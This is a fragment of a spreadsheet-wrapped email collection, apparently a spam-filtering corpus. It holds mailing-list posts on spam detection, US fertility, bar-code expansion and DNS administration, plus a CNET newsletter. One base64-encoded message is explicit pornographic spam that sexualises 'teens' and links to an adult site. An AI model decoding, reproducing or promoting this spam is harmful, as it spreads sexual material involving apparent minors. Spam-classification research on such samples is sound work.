 ) # detected as SPAM because it contained an empty text/plain part and
 ) # an "empty" (to iMail anyway) text/html part.  In reality there were
 ) # no MIME parts to this message since the body of the email contained
 ) # instructions from ecartis along with a forwarded copy of the
 ) # subscribe request which happened to be a multipart MIME message.
 ) # Sure there were MIME boundaries in the forwarded message but the
 ) # message as received wasn't a multipart MIME message so Razor should
 ) # not have detected any of the MIME boundary headers in the body of
 ) # the forwarded message.  I realized I could whitelist the part that
 ) # is listed but it would seem that the detection of MIME boundaries
 ) # should be reserved for messages that actually have multiple MIME
 ) # parts and not every message that looks like it might.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</si>
  <si>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&gt; Clearly our non-silly non-antiquated ideas about relationships have
 &gt; resulted in mostly short-duration relationships and single-parented,
 &gt; dysfunctional kids (not enough of them too boot, so to keep our
 &gt; demographics from completely keeling over we're importing them from places
 &gt; with mostly silly and antiquated ideas).
 &gt;
 &gt; At least from the viewpoint of demographics sustainability and
 &gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
 &gt; something wrong.
 There was a fascinating article in the Economist 1-2 weeks back (the issue
 with a pregnant-looking Statue of Liberty on the Front) that stated that
 even for the native US population, fertility had jumped in the last decade
 and a half. I think the current figure for the US is a little over 2, but
 not quite the ~2.1 of replacement rate. Combined with the very fertile
 non-native population, the article implied the US was going to have a
 significant increase in population over earlier predictions. As well, the
 population would overall be more youthful, with associated implications for
 being able to fund social programs, military spending, consumer spending,
 etc.
 Europe did not show the same increase in fertility.
 Some actual data for the US are here:
 http://www.census.gov/population/pop-profile/2000/chap04.pdf
 Part of:
 http://www.census.gov/population/www/pop-profile/profile2000.html
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 Let's see... a decimal digit is about 3.33 bits, so this is all about moving from a 36-bit to a 46-bit addressing system. Kind of makes the debate about IPv6 spaces quite real, as well as the Auto-ID center at MIT's proposal for a physical markup language. 
 Actual barcode size may yet decline to the point that 2-D codes may yet make it an individual-item level of addressing.
 Seeing software systems this fantastically brittle after fifty years is not, unfortunately, surprising. Are we sure we really know better yet? Are angle brackets really the key to immortality? :-&gt;
 Interesting reinforcement of the Voyager piece I archived earlier today... 
 RK
 khare@alumni.caltech.edu
 Bigger Bar Code Inches Up on Retailers
 August 12, 2002
 By KATE MURPHY 
 In a little more than two years, retailers in the United
 States and Canada will face a deadline that promises
 technological challenges akin to the Year 2000 computer
 problem. 
 Starting Jan. 1, 2005, the 12-digit bar codes retailers use
 to identify everything from cars to candy bars will go to
 13 digits. The additional number (and associated bars and
 spaces) is enough to make checkout scanners seize up and
 make computers crash, perhaps disrupting entire supply
 chains. 
 But many retailers have yet to focus on a problem that will
 require significant investments in time and capital. 
 "Most retailers are public companies that tend to live
 quarterly and not look ahead, which means they are going to
 be hit over the head with this and have to scramble at the
 last minute to avert disaster," said Thomas Friedman,
 president of Retail Systems Research Services, a company in
 Newton, Mass., that publishes a retail information
 technology newsletter. 
 Leading retailers say they have begun to address the issue.
 A spokesman for Wal-Mart Stores, the world's largest
 retailer, said the company had "embraced the concept" of an
 expanded bar code, but he did not respond to questions
 about actual measures taken to prepare computer databases
 and logistical systems. Similarly, a spokesman for the
 Target Corporation said his company was "intellectually
 ready" for the change but refused to comment on whether any
 of its stores or warehouses were technologically ready. 
 But Richard A. Galanti, the chief financial officer of
 Costco Wholesale, admitted, "The truth is, given the
 timeline, everybody's still in the assessment phase, trying
 to figure out what to do." 
 The difficulty is similar to the one posed by the Year 2000
 computer problem, when computer software had to be switched
 from two-digit entries identifying years to four-digit
 entries. Before Jan. 1, 2000, millions of lines of code had
 to be rewritten to avoid widespread computer failures. 
 Bar codes have been used in packaging since 1974, when the
 first item, a pack of chewing gum, was scanned at a
 supermarket in Ohio. The codes identify a product,
 distinguishing between an eight-ounce can of Del Monte
 creamed corn and a medium-size pair of Hanes boxer shorts.
 When a bar code is scanned, the information in the store's
 database lets the retailer assign a price and track sales
 and inventory. 
 "The bar code is the linchpin upon which everything in
 retail depends," Mr. Friedman said. 
 The reason for expanding the 12-digit bar code, known as
 the Universal Product Code, is twofold. First, there is a
 shortage of U.P.C. numbers. "There's only a certain amount
 of 12-digit numbers, and we're going to run out," said John
 Terwilliger, vice president of global markets at the
 Universal Code Council, a nonprofit organization based in
 Lawrenceville, N.J., that assigns codes in the United
 States and Canada. Second, 13-digit bar codes are used
 almost everywhere else in the world. The council's European
 counterpart, EAN International, based in Brussels, assigns
 these numbers, called European Article Numbers, to
 companies in 99 nations. "Right now," Mr. Terwilliger said,
 "foreign importers have to get a 12-digit U.P.C. to do
 business over here, which they haven't been too happy
 about." 
 Foreign manufacturers currently pass on to consumers the
 cost of getting an additional bar code and creating special
 labels for products sold in the United States and Canada.
 "It's an added expense for them, and they have to recoup it
 somewhere," said Debra Shimkus, marketing manager at the
 Chicago Importing Company, a specialty food importer whose
 overseas suppliers are often incredulous when they are told
 they have to get new bar codes for their products before
 they can be sold in American groceries. 
 Many foreign manufacturers decide that it is not worth the
 trouble. "A lot of companies have been unwilling to accept
 the additional burden," Mr. Terwilliger said, "and have
 stayed out of the market entirely." 
 American and Canadian exporters have not had the same
 obstacle because foreign retailers can easily incorporate a
 12-digit number into their 13-digit databases by making the
 first digit zero. That is why American and Canadian
 manufacturers of products that now have 12-digit codes will
 not be affected by the code expansion. A two-liter bottle
 of Coca-Cola, for example, will keep the same U.P.C., but a
 zero will be added to the beginning of its bar-code number
 in retailers' product databases. 
 "The effect of the change in the U.P.C. code falls squarely
 on retailers," said Mr. Friedman. He estimates that the
 upgrade will cost at least $2 million for a chain of 100
 stores with 10 checkout lanes a store. 
 The expense will vary depending on the age of a retailer's
 databases, software and hardware and whether it has to hire
 outside consultants to make the change. Scanners and other
 hardware bought more than three years ago will not read
 longer codes and will have to be replaced. Software more
 than five years old will also have to be scrapped. 
 "Thank God we'd already planned to buy new equipment for a
 lot of stores this year," said Richard S. Gilbert, director
 of store systems at Duane Reade, a chain of 200 drugstores
 in New York City. The stores have a total of 3,500 scanning
 devices, each costing $1,000 to $2,500. As for the
 cumbersome database modifications that need to be made, Mr.
 Gilbert said: "Our consultants say they are working on it,
 but they haven't gotten back to me with a plan. I still
 don't know how big a deal it's all going to be." 
 He might want to ask John Poss. Mr. Poss is the
 merchandising coordinator for Ace Hardware, which has 5,100
 stores and sells some 65,000 coded products. Ace overhauled
 its computer systems to accept longer bar codes in 1999.
 The company, based in Oak Brook, Ill., has retail outlets
 in 70 countries and more than a hundred foreign suppliers. 
 "It was such a struggle to get manufacturers to relabel
 things for North America," Mr. Poss said, "and we wanted
 the same system in place globally, so we decided to make
 the change." 
 The company hired a consultant, Cognizant Technology
 Solutions, which is based in Teaneck, N.J., and is a
 division of Dun &amp; Bradstreet. Ace's in-house team worked on
 the project during the day while a Cognizant office in
 India took over at night. 
 Even so, the project took almost two years to plan and
 carry out. In addition to equipment upgrades, modifications
 had to be made in more than 500 software programs in
 various company divisions (50 in distribution alone). The
 most tedious and time-consuming part of the conversion, Mr.
 Poss said, was making adjustments to databases. "Every
 database in every division touches bar code information,
 and they all needed to be reworked," he said. "It's like
 Y2K, where you had to go in and expand fields and find
 every reference to the date." 
 Though Mr. Poss would not disclose the cost of the project,
 he said the gains in efficiency and in suppliers' good will
 had been "well worth the expense." His advice to other
 retailers is to "get busy because you're facing an extreme
 challenge." 
 But moving to 13 digits may not be enough. The Universal
 Code Council and EAN International, which formed an
 alliance in 1996, strongly advise manufacturers and
 retailers to go a step further and prepare their systems to
 accommodate a 14-digit code. That is the length of a newly
 patented bar code that takes up less space. Its reduced
 size means that it can be affixed to small items like loose
 produce, and the extra digits let a retailer keep track of
 additional data like batch and lot numbers. 
 That additional information would make product recalls
 easier. "Today," Mr. Terwilliger said, "once a product is
 taken out of the shipping container in the warehouse, you
 really can't track it anymore." 
 Shipping container bar codes are already 14 digits. The
 different bar-code standards mean that retailers need
 different computer systems for shipping and receiving,
 inventory and sales. By adopting a 14-digit standard,
 retailers should be able to put all the information into a
 single database. 
 Mr. Poss said Ace had added the capacity to scan and store
 14 digits when it made its conversion three years ago. "Now
 we can scan anything," he said, "whether it's in the
 warehouse or at the register, and it immediately goes in to
 a centralized system. No more sending data between
 divisions." 
 The cost and work of making the transition to 14 digits, he
 said, was the same as it would have been for a change to 13
 digits. 
 Representatives from the standards groups said adopting a
 14-digit structure - a step for which no date has been set
 - could help streamline the sharing of data among all parts
 of a retail operation. It would also make it possible, they
 said, to identify products anywhere in the world at any
 time during the trade process. 
 "And to think it all started with pack of gum," Mr. Poss
 said. 
 http://www.nytimes.com/2002/08/12/technology/12CODE.html?ex=1030208144&amp;ei=1&amp;en=1b5705e7bd2048e6
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi Kevin,
 In the past when administering large domains, I've used the DNSTool -
 http://www.gormand.com.au/tools/dnstool/guide.html
 One custom change I made to this tool was to modify it so that it used a
 combination of OpenSSH and sudo for remote commands, file transfers, etc.
 This may, or may not be what you're after - I'm presuming that you're
 considering writing a tool to do the maintenance of the domains?
 Regards,
   Andrew
 &lt;custom_sig&gt;
    This email is my own opinion, no-one elses, yada yada...
 &lt;/custom_sig&gt;
 --
 Andrew Barnes
                     kevin lyda                                                                                                      
                     &lt;kevin+dated+1027780746.c57855        To:     irish linux users group &lt;ilug@linux.ie&gt;                           
                     @linux.ie&gt;                            cc:                                                                       
                     Sent by: ilug-admin@linux.ie          Subject:     [ILUG] bind + lex + yacc...                                  
                     22/07/2002 15:39                                                                                                
 i recently received this email from a friend of mine in the states:
     i'm trying to figure out how to maintain about 200 domains, with a
     hundred or so computers per domain.  some internal, some external.
     i recently learned lex and yacc and i'm thinking that's the way to go.
     i don't really know perl and i know it's useful but i think i can
     write c faster then perl.
     is this a good idea?
     ps  we're really busy.
 obviously as a stupid developer with no real admin experience to speak
 of, i'm not qualified to answer this question.  does anyone with real
 admin experience have any suggestions here?  the problem sounds really
 hard, and i doubt anyone has had to deal with this level of complexity
 so there probably aren't any existing tools written.
 anyone else have any opinions or experience i could pass on?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andrew.p.barnes
 AIB
 Internet Technical Support
 Bankcentre
 01-6411600
 This document is strictly confidential and is intended for use by the
 addressee unless otherwise indicated.
 Allied Irish Banks
 This Disclaimer has been generated by CMDis
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Movie Project
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Steph
 I have found the talent that you are looking for, check out www.piercebrosnanlookalike.com
 I found it last nite, he will be ideal for the movie, we should audition him next week. 
 Let's do lunch next week call me.
 Davida 
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg" wrote:
 &gt; So, who has done RSA implementation before?
 /me raises hand.
 &gt; Having a typo-I-cant-spot problem with my CRT...
 Send me the source.
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: You want sex? 7099ocYT9-261UccU3485gGCz0-11-27
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E3_44B55B3D.C1001A02
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 MDQyNmZwY0o0LTQ3MEJrZEQ5NTA3bmZxbzEtNDEyc0NTUDc0MjlxdVdKMi0x
 MDVlSktyNDk4M0R6SHQ4LTY5MEJwTkQ1NjMwQURsNzANCjxodG1sPjxib2R5
 IGxpbms9I0ZGRkYwMCB2bGluaz0jRkZGRjAwIGFsaW5rPSNGRkZGMDAgdGV4
 dD0jRkZGRjAwIGJnY29sb3I9IzAwMDAwMD4gPHRhYmxlIGJvcmRlckNvbG9y
 PSMwMDAwMDAgd2lkdGg9NjAwIGFsaWduPWNlbnRlciBiZ0NvbG9yPSM2Njk5
 MzMgYm9yZGVyPTM+PHRyPjx0ZCBhbGlnbj1taWRkbGU+PGZvbnQgZmFjZT1B
 cmlhbCxIZWx2ZXRpY2Esc2Fucy1zZXJpZj48YnI+IDxmb250IGNvbG9yPXdo
 aXRlIHNpemU9KzM+PGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC93
 ZXRiaXRzL2luZGV4Lmh0bT5XZXRiaXRzPC9hPjwvZm9udD48L2ZvbnQ+PGEg
 aHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC93ZXRiaXRzL2luZGV4Lmh0
 bT4gPC9hPjxwPjxmb250IGZhY2U9QXJpYWwsSGVsdmV0aWNhLHNhbnMtc2Vy
 aWYgY29sb3I9I2ZmZmYwMCBzaXplPTM+PGI+IEdvbGRlbiBTaG93ZXIgRXh0
 cmF2YWdhbnphPC9iPjwvZm9udD48Zm9udCBmYWNlPUFyaWFsLEhlbHZldGlj
 YSxzYW5zLXNlcmlmPjxicj4gPGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNo
 Lm5ldC93ZXRiaXRzL2luZGV4Lmh0bT4gPGZvbnQgY29sb3I9eWVsbG93IHNp
 emU9KzI+RU5URVIhPC9mb250PjwvYT48L3A+IDx0YWJsZSB3aWR0aD01MDAg
 YWxpZ249Y2VudGVyPjx0cj48dGQgYWxpZ249bWlkZGxlPjxmb250IGNvbG9y
 PXdoaXRlIHNpemU9KzM+VW5iZWxpZXZhYmxlIFNleCBBY3RzITwvZm9udD48
 YnI+IDxhIGhyZWY9aHR0cDovL3d3dy54eHhtYXRjaC5uZXQvd2V0Yml0cy9p
 bmRleC5odG0+IDxmb250IGNvbG9yPXllbGxvdyBzaXplPSs0PlNoZSBDYW4g
 UGVlIEFsbCBEYXk8L2ZvbnQ+PC9hPjxicj4gPGZvbnQgY29sb3I9YmxhY2sg
 c2l6ZT0rMj5Db2NrIGNyYXZpbmcgdGVlbnMgc3F1aXJtIGFyb3VuZCBjb3Zl
 cmVkIGluIHBlZSB3aXRoIGEgdGhyb2JiaW5nIGNvY2sgYnVyaWVkIHRvIHRo
 ZSBoaWx0LiBTbGlwcGVyeSBhbmFsIHdob3JlcyBnZXR0aW5nIHdldCE8YnI+
 IDxmb250IHNpemU9KzMgZWxsb3c+U3ByZWFkICdlbSA8L2ZvbnQ+PC9mb250
 PiA8Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0rMz5QZWU8L2ZvbnQ+PGZvbnQg
 Y29sb3I9YmxhY2sgc2l6ZT0rMj48Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0r
 Mz5naXJsITwvZm9udD48YnI+IDxhIGhyZWY9aHR0cDovL3d3dy54eHhtYXRj
 aC5uZXQvd2V0Yml0cy9pbmRleC5odG0+IDxmb250IGNvbG9yPXllbGxvdyBz
 aXplPSs0PkVudGVyITwvZm9udD48L2E+PC9mb250PjwvdGQ+PC90cj4gPC90
 YWJsZT4gPHRhYmxlIHdpZHRoPTUwMCBhbGlnbj1jZW50ZXI+PHRyPjx0ZCBh
 bGlnbj1taWRkbGU+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0rMT5TZXggY3Jh
 emVkIHBlZWdpcmxzIHJpZGUgY29jayBhbGwgZGF5IHdoaWxlIHBpc3Npbmcg
 Zm91bnRhaW5zIG9uIHRoZWlyIHBhcnRuZXJzLiBQZWVnaXJscyB0aGF0IGNh
 bid0IGdldCBlbm91Z2ggY3VtLCBzdWNraW5nIG9mZiBkaWNrIGFmdGVyIGRp
 Y2suIEhvcm55IHNsdXRzIHNwcmVhZGluZyB0aGVtIGZvciBldmVyeSBUb20s
 IERpY2sgYW5kIENvY2sgdG8gY29tZSBpbiEgPC9mb250PjwvdGQ+PC90cj4g
 PC90YWJsZT4gPHRhYmxlIGJvcmRlckNvbG9yPWJsYWNrIGJvcmRlckNvbG9y
 RGFyaz1ibGFjayBhbGlnbj1jZW50ZXIgYm9yZGVyQ29sb3JMaWdodD1yZWQg
 Ym9yZGVyPTI+PHRyPjx0ZCBhbGlnbj1taWRkbGUgd2lkdGg9MjAwPiA8YSBo
 cmVmPWh0dHA6Ly93d3cueHh4bWF0Y2gubmV0L3dldGJpdHMvaW5kZXguaHRt
 PiA8Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0rMT5VbHRyYS1IYXJkY29yZSBB
 Y3Rpb24gPC9mb250PjwvYT48L3RkPjx0ZCBhbGlnbj1taWRkbGUgd2lkdGg9
 MjAwPiA8YSBocmVmPWh0dHA6Ly93d3cueHh4bWF0Y2gubmV0L3dldGJpdHMv
 aW5kZXguaHRtPiA8Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0rMT5UZWVuYWdl
 IFBlZWdpcmxzIDwvZm9udD48L2E+PC90ZD48dGQgYWxpZ249bWlkZGxlIHdp
 ZHRoPTIwMD4gPGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC93ZXRi
 aXRzL2luZGV4Lmh0bT4gPGZvbnQgY29sb3I9eWVsbG93IHNpemU9KzE+V2ls
 ZCBQZWUgUGFydGllcyA8L2ZvbnQ+PC9hPjwvdGQ+PC90cj48dHI+PHRkIGFs
 aWduPW1pZGRsZSB3aWR0aD0yMDA+IDxhIGhyZWY9aHR0cDovL3d3dy54eHht
 YXRjaC5uZXQvd2V0Yml0cy9pbmRleC5odG0+IDxmb250IGNvbG9yPXllbGxv
 dyBzaXplPSsxPkJpemFycmUgVmlkZW9zIDwvZm9udD48L2E+PC90ZD48dGQg
 YWxpZ249bWlkZGxlIHdpZHRoPTIwMD4gPGEgaHJlZj1odHRwOi8vd3d3Lnh4
 eG1hdGNoLm5ldC93ZXRiaXRzL2luZGV4Lmh0bT4gPGZvbnQgY29sb3I9eWVs
 bG93IHNpemU9KzE+SWxsZWdhbCBBY3Rpb24gPC9mb250PjwvYT48L3RkPjx0
 ZCBhbGlnbj1taWRkbGUgd2lkdGg9MjAwPiA8YSBocmVmPWh0dHA6Ly93d3cu
 eHh4bWF0Y2gubmV0L3dldGJpdHMvaW5kZXguaHRtPiA8Zm9udCBjb2xvcj15
 ZWxsb3cgc2l6ZT0rMT5IaWRkZW4gUGVlIENhbXMgPC9mb250PjwvYT48L3Rk
 PjwvdHI+IDwvdGFibGU+PHA+PGJyPiA8YSBocmVmPWh0dHA6Ly93d3cueHh4
 bWF0Y2gubmV0L3dldGJpdHMvaW5kZXguaHRtPiA8Zm9udCBjb2xvcj15ZWxs
 b3cgc2l6ZT0rMz5FbnRlciBXZXRiaXRzPC9mb250PjwvYT48YnI+PGJyPiAm
 bmJzcDs8L2ZvbnQ+PC90ZD48L3RyPiA8L3RhYmxlPjwvYm9keT48L2h0bWw+
 DQo3NjAyaVZTUzgtMDgwbDEy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Message Boards Dispatch&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/nl/mb/hd.gif" width="442" height="60" border="0" alt="CNET Message Boards Newsletter"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 	&lt;td width=160 rowspan=2&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;p&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font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value="http://xlink.zdnet.com/cgi-bin/texis/forums/forums/search.html/+/cnet/?Utext=%%q%%&amp;subcat=&amp;cobrand=cnet&amp;template=cnetnt&amp;Usch=5&amp;ROS=1"&gt;Messages
  &lt;option value="http://cnet.search.com/search?tag=ex.messageboards.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.messageboards.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
                 &lt;!-- Top 10 Forums --&gt;
 				&lt;img src="http://www.cnet.com/i/nl/mb/rhc_top10.gif" alt="More Forums" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;1. &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPWu8nxIpSywvjsK-FdLP4R" &gt;Wireless&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;2. &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMEosNOrUywq2NRJSBTeR" &gt;Computer Help&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;3. &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9IE_HtDzeFOPq1FsnysR" &gt;Speakeasy&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;4. &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BskD07vxoLF5vLk7KCgFZR" &gt;Windows 98&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;5. &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BMunEryF0mobF8XEDxwcdR" &gt;PC Hardware&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;6. &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpEQ0CYH6dm10-kl0aSxkZcR" &gt;Windows Me&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;7. &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwy7yD7BdrPXGugH6NQYvURR" &gt;Computer Newbies&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;8. &lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkg7jGWzcA_oFokcTbTDoVFR" &gt;Downloads&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;9. &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9Ns0-9GH5BPffACEH5fCA9R" &gt;Windows XP&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;10.&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMxelsWwSsBBBkqU8niQ7RR" &gt;Virus &amp; Security&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /Top 10 Forums --&gt;
  				 &lt;br&gt;
 				&lt;!-- Hot Products --&gt;
 				&lt;img src="http://www.cnet.com/i/nl/mb/rhc_hot.gif" alt="Hot Products" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				Check out the User Opinions on these Hot Products and then submit one of your own.&lt;br&gt;
 				&amp;nbsp;&lt;br&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;84%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;16%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(19 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxKv3IEoyFPcZsjpRp-LFR" &gt;Sony DCR-TRV50 
 &lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics: Camcorders&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
